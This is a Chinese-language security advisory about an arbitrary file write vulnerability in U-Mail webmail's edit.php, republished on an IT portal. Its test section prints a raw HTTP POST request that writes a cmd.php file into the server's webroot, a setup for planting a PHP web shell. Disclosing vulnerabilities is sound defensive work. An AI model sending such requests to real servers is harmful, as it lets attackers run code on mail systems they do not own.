U-Mail Webmail 'edit.php'任意文件修改漏洞

  作者:Amteam.org
2008/11/12 10:16:00
本文关键字: 存储 备份

  U-Mail专家级邮件系统是福洽科技最新推出的第四代企业邮局系统。U-Mail邮件系统的edit.php文件没有正确地处理HTTP POST参数,远程攻击者可以通过提交恶意请求向webroot下的任意文件写入数据。如果向带有.php扩展的文件写入了PHP代码的话,就可能导致执行任意代码。

  <*来源:wangshennan (wsn1983@gmail.com)

  链接:http://secunia.com/advisories/32540/

  http://milw0rm.com/exploits/6898*>

  测试方法:

  警 告

  以下程序可能带有攻击性,仅供安全研究之用。使用者风险自负!

      POST /webmail/modules/filesystem/edit.php HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
  application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-
  xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
  Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
  Accept-Language: zh-cn
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
  Host: mail.d4rkn3t.cn
  Content-Length: 120
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18
  path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=

  建议:

  厂商补丁:

  目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:

  http://www.comingchina.com/index.html

责编:
vsharing微信扫一扫实时了解行业动态
portalart微信扫一扫分享本文给好友

著作权声明:kaiyun体育官方人口 文章著作权分属kaiyun体育官方人口 、网友和合作伙伴,部分非原创文章作者信息可能有所缺失,如需补充或修改请与我们联系,工作人员会在1个工作日内配合处理。
最新专题
网络安全热点透析

随着移动互联、大数据、云计算、物联网等技术的日益发展,在这些热点技术为个人生活带来便利的同时,也为企业发展..

数据安全医药行业解决方案

采用身份鉴别、访问控制、数据加密以及权限控制等多种安全防护技术手段,保障数据库中医药数据只能被合法用户合规..

    畅享
    首页
    返回
    顶部
    ×
      信息化规划
      IT总包
      供应商选型
      IT监理
      开发维护外包
      评估维权
    客服电话
    400-698-9918
    Baidu
    map